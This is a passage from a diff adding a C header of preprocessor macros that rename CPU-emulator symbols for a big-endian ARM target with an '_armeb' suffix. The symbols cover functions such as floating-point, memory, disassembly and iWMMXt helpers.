cpu_handle_debug_exception_armeb +#define cpu_handle_guest_debug cpu_handle_guest_debug_armeb +#define cpu_inb cpu_inb_armeb +#define cpu_inl cpu_inl_armeb +#define cpu_interrupt cpu_interrupt_armeb +#define cpu_interrupt_handler cpu_interrupt_handler_armeb +#define cpu_inw cpu_inw_armeb +#define cpu_io_recompile cpu_io_recompile_armeb +#define cpu_is_stopped cpu_is_stopped_armeb +#define cpu_ldl_code cpu_ldl_code_armeb +#define cpu_ldub_code cpu_ldub_code_armeb +#define cpu_lduw_code cpu_lduw_code_armeb +#define cpu_memory_rw_debug cpu_memory_rw_debug_armeb +#define cpu_mmu_index cpu_mmu_index_armeb +#define cpu_outb cpu_outb_armeb +#define cpu_outl cpu_outl_armeb +#define cpu_outw cpu_outw_armeb +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_armeb +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_armeb +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_armeb +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_armeb +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_armeb +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_armeb +#define cpu_physical_memory_map cpu_physical_memory_map_armeb +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_armeb +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_armeb +#define cpu_physical_memory_rw cpu_physical_memory_rw_armeb +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_armeb +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_armeb +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_armeb +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_armeb +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_armeb +#define cpu_register cpu_register_armeb +#define cpu_register_types cpu_register_types_armeb +#define 
cpu_restore_state cpu_restore_state_armeb +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_armeb +#define cpu_single_step cpu_single_step_armeb +#define cpu_tb_exec cpu_tb_exec_armeb +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_armeb +#define cpu_to_be64 cpu_to_be64_armeb +#define cpu_to_le32 cpu_to_le32_armeb +#define cpu_to_le64 cpu_to_le64_armeb +#define cpu_type_info cpu_type_info_armeb +#define cpu_unassigned_access cpu_unassigned_access_armeb +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_armeb +#define cpu_watchpoint_insert cpu_watchpoint_insert_armeb +#define cpu_watchpoint_remove cpu_watchpoint_remove_armeb +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_armeb +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_armeb +#define crc32c_table crc32c_table_armeb +#define create_new_memory_mapping create_new_memory_mapping_armeb +#define csselr_write csselr_write_armeb +#define cto32 cto32_armeb +#define ctr_el0_access ctr_el0_access_armeb +#define ctz32 ctz32_armeb +#define ctz64 ctz64_armeb +#define dacr_write dacr_write_armeb +#define dbgbcr_write dbgbcr_write_armeb +#define dbgbvr_write dbgbvr_write_armeb +#define dbgwcr_write dbgwcr_write_armeb +#define dbgwvr_write dbgwvr_write_armeb +#define debug_cp_reginfo debug_cp_reginfo_armeb +#define debug_frame debug_frame_armeb +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_armeb +#define define_arm_cp_regs define_arm_cp_regs_armeb +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_armeb +#define define_debug_regs define_debug_regs_armeb +#define define_one_arm_cp_reg define_one_arm_cp_reg_armeb +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_armeb +#define deposit32 deposit32_armeb +#define deposit64 deposit64_armeb +#define deregister_tm_clones deregister_tm_clones_armeb +#define device_class_base_init device_class_base_init_armeb +#define device_class_init device_class_init_armeb 
+#define device_finalize device_finalize_armeb +#define device_get_realized device_get_realized_armeb +#define device_initfn device_initfn_armeb +#define device_post_init device_post_init_armeb +#define device_reset device_reset_armeb +#define device_set_realized device_set_realized_armeb +#define device_type_info device_type_info_armeb +#define disas_arm_insn disas_arm_insn_armeb +#define disas_coproc_insn disas_coproc_insn_armeb +#define disas_dsp_insn disas_dsp_insn_armeb +#define disas_iwmmxt_insn disas_iwmmxt_insn_armeb +#define disas_neon_data_insn disas_neon_data_insn_armeb +#define disas_neon_ls_insn disas_neon_ls_insn_armeb +#define disas_thumb2_insn disas_thumb2_insn_armeb +#define disas_thumb_insn disas_thumb_insn_armeb +#define disas_vfp_insn disas_vfp_insn_armeb +#define disas_vfp_v8_insn disas_vfp_v8_insn_armeb +#define do_arm_semihosting do_arm_semihosting_armeb +#define do_clz16 do_clz16_armeb +#define do_clz8 do_clz8_armeb +#define do_constant_folding do_constant_folding_armeb +#define do_constant_folding_2 do_constant_folding_2_armeb +#define do_constant_folding_cond do_constant_folding_cond_armeb +#define do_constant_folding_cond2 do_constant_folding_cond2_armeb +#define do_constant_folding_cond_32 do_constant_folding_cond_32_armeb +#define do_constant_folding_cond_64 do_constant_folding_cond_64_armeb +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_armeb +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_armeb +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_armeb +#define do_ssat do_ssat_armeb +#define do_usad do_usad_armeb +#define do_usat do_usat_armeb +#define do_v7m_exception_exit do_v7m_exception_exit_armeb +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_armeb +#define dummy_func dummy_func_armeb +#define dummy_section dummy_section_armeb +#define _DYNAMIC _DYNAMIC_armeb +#define _edata _edata_armeb +#define _end _end_armeb +#define end_list end_list_armeb +#define eq128 eq128_armeb +#define ErrorClass_lookup 
ErrorClass_lookup_armeb +#define error_copy error_copy_armeb +#define error_exit error_exit_armeb +#define error_get_class error_get_class_armeb +#define error_get_pretty error_get_pretty_armeb +#define error_setg_file_open error_setg_file_open_armeb +#define estimateDiv128To64 estimateDiv128To64_armeb +#define estimateSqrt32 estimateSqrt32_armeb +#define excnames excnames_armeb +#define excp_is_internal excp_is_internal_armeb +#define extended_addresses_enabled extended_addresses_enabled_armeb +#define extended_mpu_ap_bits extended_mpu_ap_bits_armeb +#define extract32 extract32_armeb +#define extract64 extract64_armeb +#define extractFloat128Exp extractFloat128Exp_armeb +#define extractFloat128Frac0 extractFloat128Frac0_armeb +#define extractFloat128Frac1 extractFloat128Frac1_armeb +#define extractFloat128Sign extractFloat128Sign_armeb +#define extractFloat16Exp extractFloat16Exp_armeb +#define extractFloat16Frac extractFloat16Frac_armeb +#define extractFloat16Sign extractFloat16Sign_armeb +#define extractFloat32Exp extractFloat32Exp_armeb +#define extractFloat32Frac extractFloat32Frac_armeb +#define extractFloat32Sign extractFloat32Sign_armeb +#define extractFloat64Exp extractFloat64Exp_armeb +#define extractFloat64Frac extractFloat64Frac_armeb +#define extractFloat64Sign extractFloat64Sign_armeb +#define extractFloatx80Exp extractFloatx80Exp_armeb +#define extractFloatx80Frac extractFloatx80Frac_armeb +#define extractFloatx80Sign extractFloatx80Sign_armeb +#define fcse_write fcse_write_armeb +#define find_better_copy find_better_copy_armeb +#define find_default_machine find_default_machine_armeb +#define find_desc_by_name find_desc_by_name_armeb +#define find_first_bit find_first_bit_armeb +#define find_paging_enabled_cpu find_paging_enabled_cpu_armeb +#define find_ram_block find_ram_block_armeb +#define find_ram_offset find_ram_offset_armeb +#define find_string find_string_armeb +#define find_type find_type_armeb +#define _fini _fini_armeb +#define 
flatrange_equal flatrange_equal_armeb +#define flatview_destroy flatview_destroy_armeb +#define flatview_init flatview_init_armeb +#define flatview_insert flatview_insert_armeb +#define flatview_lookup flatview_lookup_armeb +#define flatview_ref flatview_ref_armeb +#define flatview_simplify flatview_simplify_armeb +#define flatview_unref flatview_unref_armeb +#define float128_add float128_add_armeb +#define float128_compare float128_compare_armeb +#define float128_compare_internal float128_compare_internal_armeb +#define float128_compare_quiet float128_compare_quiet_armeb +#define float128_default_nan float128_default_nan_armeb +#define float128_div float128_div_armeb +#define float128_eq float128_eq_armeb +#define float128_eq_quiet float128_eq_quiet_armeb +#define float128_is_quiet_nan float128_is_quiet_nan_armeb +#define float128_is_signaling_nan float128_is_signaling_nan_armeb +#define float128_le float128_le_armeb +#define float128_le_quiet float128_le_quiet_armeb +#define float128_lt float128_lt_armeb +#define float128_lt_quiet float128_lt_quiet_armeb +#define float128_maybe_silence_nan float128_maybe_silence_nan_armeb +#define float128_mul float128_mul_armeb +#define float128_rem float128_rem_armeb +#define float128_round_to_int float128_round_to_int_armeb +#define float128_scalbn float128_scalbn_armeb +#define float128_sqrt float128_sqrt_armeb +#define float128_sub float128_sub_armeb +#define float128ToCommonNaN float128ToCommonNaN_armeb +#define float128_to_float32 float128_to_float32_armeb +#define float128_to_float64 float128_to_float64_armeb +#define float128_to_floatx80 float128_to_floatx80_armeb +#define float128_to_int32 float128_to_int32_armeb +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_armeb +#define float128_to_int64 float128_to_int64_armeb +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_armeb +#define float128_unordered float128_unordered_armeb +#define float128_unordered_quiet 
float128_unordered_quiet_armeb +#define float16_default_nan float16_default_nan_armeb +#define float16_is_quiet_nan float16_is_quiet_nan_armeb +#define float16_is_signaling_nan float16_is_signaling_nan_armeb +#define float16_maybe_silence_nan float16_maybe_silence_nan_armeb +#define float16ToCommonNaN float16ToCommonNaN_armeb +#define float16_to_float32 float16_to_float32_armeb +#define float16_to_float64 float16_to_float64_armeb +#define float32_abs float32_abs_armeb +#define float32_add float32_add_armeb +#define float32_chs float32_chs_armeb +#define float32_compare float32_compare_armeb +#define float32_compare_internal float32_compare_internal_armeb +#define float32_compare_quiet float32_compare_quiet_armeb +#define float32_default_nan float32_default_nan_armeb +#define float32_div float32_div_armeb +#define float32_eq float32_eq_armeb +#define float32_eq_quiet float32_eq_quiet_armeb +#define float32_exp2 float32_exp2_armeb +#define float32_exp2_coefficients float32_exp2_coefficients_armeb +#define float32_is_any_nan float32_is_any_nan_armeb +#define float32_is_infinity float32_is_infinity_armeb +#define float32_is_neg float32_is_neg_armeb +#define float32_is_quiet_nan float32_is_quiet_nan_armeb +#define float32_is_signaling_nan float32_is_signaling_nan_armeb +#define float32_is_zero float32_is_zero_armeb +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_armeb +#define float32_le float32_le_armeb +#define float32_le_quiet float32_le_quiet_armeb +#define float32_log2 float32_log2_armeb +#define float32_lt float32_lt_armeb +#define float32_lt_quiet float32_lt_quiet_armeb +#define float32_max float32_max_armeb +#define float32_maxnum float32_maxnum_armeb +#define float32_maxnummag float32_maxnummag_armeb +#define float32_maybe_silence_nan float32_maybe_silence_nan_armeb +#define float32_min float32_min_armeb +#define float32_minmax float32_minmax_armeb +#define float32_minnum float32_minnum_armeb +#define float32_minnummag float32_minnummag_armeb 
+#define float32_mul float32_mul_armeb +#define float32_muladd float32_muladd_armeb +#define float32_rem float32_rem_armeb +#define float32_round_to_int float32_round_to_int_armeb +#define float32_scalbn float32_scalbn_armeb +#define float32_set_sign float32_set_sign_armeb +#define float32_sqrt float32_sqrt_armeb +#define float32_squash_input_denormal float32_squash_input_denormal_armeb +#define float32_sub float32_sub_armeb +#define float32ToCommonNaN float32ToCommonNaN_armeb +#define float32_to_float128 float32_to_float128_armeb +#define float32_to_float16 float32_to_float16_armeb +#define float32_to_float64 float32_to_float64_armeb +#define float32_to_floatx80 float32_to_floatx80_armeb +#define float32_to_int16 float32_to_int16_armeb +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_armeb +#define float32_to_int32 float32_to_int32_armeb +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_armeb +#define float32_to_int64 float32_to_int64_armeb +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_armeb +#define float32_to_uint16 float32_to_uint16_armeb +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_armeb +#define float32_to_uint32 float32_to_uint32_armeb +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_armeb +#define float32_to_uint64 float32_to_uint64_armeb +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_armeb +#define float32_unordered float32_unordered_armeb +#define float32_unordered_quiet float32_unordered_quiet_armeb +#define float64_abs float64_abs_armeb +#define float64_add float64_add_armeb +#define float64_chs float64_chs_armeb +#define float64_compare float64_compare_armeb +#define float64_compare_internal float64_compare_internal_armeb +#define float64_compare_quiet float64_compare_quiet_armeb +#define float64_default_nan float64_default_nan_armeb +#define float64_div float64_div_armeb +#define float64_eq float64_eq_armeb 
+#define float64_eq_quiet float64_eq_quiet_armeb +#define float64_is_any_nan float64_is_any_nan_armeb +#define float64_is_infinity float64_is_infinity_armeb +#define float64_is_neg float64_is_neg_armeb +#define float64_is_quiet_nan float64_is_quiet_nan_armeb +#define float64_is_signaling_nan float64_is_signaling_nan_armeb +#define float64_is_zero float64_is_zero_armeb +#define float64_le float64_le_armeb +#define float64_le_quiet float64_le_quiet_armeb +#define float64_log2 float64_log2_armeb +#define float64_lt float64_lt_armeb +#define float64_lt_quiet float64_lt_quiet_armeb +#define float64_max float64_max_armeb +#define float64_maxnum float64_maxnum_armeb +#define float64_maxnummag float64_maxnummag_armeb +#define float64_maybe_silence_nan float64_maybe_silence_nan_armeb +#define float64_min float64_min_armeb +#define float64_minmax float64_minmax_armeb +#define float64_minnum float64_minnum_armeb +#define float64_minnummag float64_minnummag_armeb +#define float64_mul float64_mul_armeb +#define float64_muladd float64_muladd_armeb +#define float64_rem float64_rem_armeb +#define float64_round_to_int float64_round_to_int_armeb +#define float64_scalbn float64_scalbn_armeb +#define float64_set_sign float64_set_sign_armeb +#define float64_sqrt float64_sqrt_armeb +#define float64_squash_input_denormal float64_squash_input_denormal_armeb +#define float64_sub float64_sub_armeb +#define float64ToCommonNaN float64ToCommonNaN_armeb +#define float64_to_float128 float64_to_float128_armeb +#define float64_to_float16 float64_to_float16_armeb +#define float64_to_float32 float64_to_float32_armeb +#define float64_to_floatx80 float64_to_floatx80_armeb +#define float64_to_int16 float64_to_int16_armeb +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_armeb +#define float64_to_int32 float64_to_int32_armeb +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_armeb +#define float64_to_int64 float64_to_int64_armeb +#define 
float64_to_int64_round_to_zero float64_to_int64_round_to_zero_armeb +#define float64_to_uint16 float64_to_uint16_armeb +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_armeb +#define float64_to_uint32 float64_to_uint32_armeb +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_armeb +#define float64_to_uint64 float64_to_uint64_armeb +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_armeb +#define float64_trunc_to_int float64_trunc_to_int_armeb +#define float64_unordered float64_unordered_armeb +#define float64_unordered_quiet float64_unordered_quiet_armeb +#define float_raise float_raise_armeb +#define floatx80_add floatx80_add_armeb +#define floatx80_compare floatx80_compare_armeb +#define floatx80_compare_internal floatx80_compare_internal_armeb +#define floatx80_compare_quiet floatx80_compare_quiet_armeb +#define floatx80_default_nan floatx80_default_nan_armeb +#define floatx80_div floatx80_div_armeb +#define floatx80_eq floatx80_eq_armeb +#define floatx80_eq_quiet floatx80_eq_quiet_armeb +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_armeb +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_armeb +#define floatx80_le floatx80_le_armeb +#define floatx80_le_quiet floatx80_le_quiet_armeb +#define floatx80_lt floatx80_lt_armeb +#define floatx80_lt_quiet floatx80_lt_quiet_armeb +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_armeb +#define floatx80_mul floatx80_mul_armeb +#define floatx80_rem floatx80_rem_armeb +#define floatx80_round_to_int floatx80_round_to_int_armeb +#define floatx80_scalbn floatx80_scalbn_armeb +#define floatx80_sqrt floatx80_sqrt_armeb +#define floatx80_sub floatx80_sub_armeb +#define floatx80ToCommonNaN floatx80ToCommonNaN_armeb +#define floatx80_to_float128 floatx80_to_float128_armeb +#define floatx80_to_float32 floatx80_to_float32_armeb +#define floatx80_to_float64 floatx80_to_float64_armeb +#define floatx80_to_int32 floatx80_to_int32_armeb 
+#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_armeb +#define floatx80_to_int64 floatx80_to_int64_armeb +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_armeb +#define floatx80_unordered floatx80_unordered_armeb +#define floatx80_unordered_quiet floatx80_unordered_quiet_armeb +#define flush_icache_range flush_icache_range_armeb +#define format_string format_string_armeb +#define fp_decode_rm fp_decode_rm_armeb +#define frame_dummy frame_dummy_armeb +#define free_range free_range_armeb +#define fstat64 fstat64_armeb +#define futex_wait futex_wait_armeb +#define futex_wake futex_wake_armeb +#define gen_aa32_ld16s gen_aa32_ld16s_armeb +#define gen_aa32_ld16u gen_aa32_ld16u_armeb +#define gen_aa32_ld32u gen_aa32_ld32u_armeb +#define gen_aa32_ld64 gen_aa32_ld64_armeb +#define gen_aa32_ld8s gen_aa32_ld8s_armeb +#define gen_aa32_ld8u gen_aa32_ld8u_armeb +#define gen_aa32_st16 gen_aa32_st16_armeb +#define gen_aa32_st32 gen_aa32_st32_armeb +#define gen_aa32_st64 gen_aa32_st64_armeb +#define gen_aa32_st8 gen_aa32_st8_armeb +#define gen_adc gen_adc_armeb +#define gen_adc_CC gen_adc_CC_armeb +#define gen_add16 gen_add16_armeb +#define gen_add_carry gen_add_carry_armeb +#define gen_add_CC gen_add_CC_armeb +#define gen_add_datah_offset gen_add_datah_offset_armeb +#define gen_add_data_offset gen_add_data_offset_armeb +#define gen_addq gen_addq_armeb +#define gen_addq_lo gen_addq_lo_armeb +#define gen_addq_msw gen_addq_msw_armeb +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_armeb +#define gen_arm_shift_im gen_arm_shift_im_armeb +#define gen_arm_shift_reg gen_arm_shift_reg_armeb +#define gen_bx gen_bx_armeb +#define gen_bx_im gen_bx_im_armeb +#define gen_clrex gen_clrex_armeb +#define generate_memory_topology generate_memory_topology_armeb +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_armeb +#define gen_exception gen_exception_armeb +#define gen_exception_insn gen_exception_insn_armeb +#define 
gen_exception_internal gen_exception_internal_armeb +#define gen_exception_internal_insn gen_exception_internal_insn_armeb +#define gen_exception_return gen_exception_return_armeb +#define gen_goto_tb gen_goto_tb_armeb +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_armeb +#define gen_helper_add_saturate gen_helper_add_saturate_armeb +#define gen_helper_add_setq gen_helper_add_setq_armeb +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_armeb +#define gen_helper_clz32 gen_helper_clz32_armeb +#define gen_helper_clz64 gen_helper_clz64_armeb +#define gen_helper_clz_arm gen_helper_clz_arm_armeb +#define gen_helper_cpsr_read gen_helper_cpsr_read_armeb +#define gen_helper_cpsr_write gen_helper_cpsr_write_armeb +#define gen_helper_crc32_arm gen_helper_crc32_arm_armeb +#define gen_helper_crc32c gen_helper_crc32c_armeb +#define gen_helper_crypto_aese gen_helper_crypto_aese_armeb +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_armeb +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_armeb +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_armeb +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_armeb +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_armeb +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_armeb +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_armeb +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_armeb +#define gen_helper_double_saturate gen_helper_double_saturate_armeb +#define gen_helper_exception_internal gen_helper_exception_internal_armeb +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_armeb +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_armeb +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_armeb +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_armeb +#define gen_helper_get_user_reg gen_helper_get_user_reg_armeb +#define gen_helper_iwmmxt_addcb 
gen_helper_iwmmxt_addcb_armeb +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_armeb +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_armeb +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_armeb +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_armeb +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_armeb +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_armeb +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_armeb +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_armeb +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_armeb +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_armeb +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_armeb +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_armeb +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_armeb +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_armeb +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_armeb +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_armeb +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_armeb +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_armeb +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_armeb +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_armeb +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_armeb +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_armeb +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_armeb +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_armeb +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_armeb +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_armeb +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_armeb +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_armeb +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_armeb +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_armeb +#define gen_helper_iwmmxt_macuw 
gen_helper_iwmmxt_macuw_armeb +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_armeb +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_armeb +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_armeb +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_armeb +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_armeb +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_armeb +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_armeb +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_armeb +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_armeb +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_armeb +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_armeb +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_armeb +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_armeb +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_armeb +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_armeb +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_armeb +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_armeb +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_armeb +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_armeb +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_armeb +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_armeb +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_armeb +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_armeb +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_armeb +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_armeb +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_armeb +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_armeb +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_armeb +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_armeb +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_armeb +#define gen_helper_iwmmxt_rorl 
gen_helper_iwmmxt_rorl_armeb +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_armeb +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_armeb +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_armeb +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_armeb +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_armeb +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_armeb +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_armeb +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_armeb +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_armeb +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_armeb +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_armeb +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_armeb +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_armeb +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_armeb +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_armeb +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_armeb +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_armeb +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_armeb +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_armeb +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_armeb +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_armeb +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_armeb +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_armeb +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_armeb +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_armeb +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_armeb +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_armeb +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_armeb +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_armeb +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_armeb +#define gen_helper_iwmmxt_unpackhul 
gen_helper_iwmmxt_unpackhul_armeb +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_armeb +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_armeb +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_armeb +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_armeb +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_armeb +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_armeb +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_armeb +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_armeb +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_armeb +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_armeb +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_armeb +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_armeb +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_armeb +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_armeb +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_armeb +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_armeb +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_armeb +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_armeb +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_armeb +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_armeb +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_armeb +#define gen_helper_neon_abd_u16 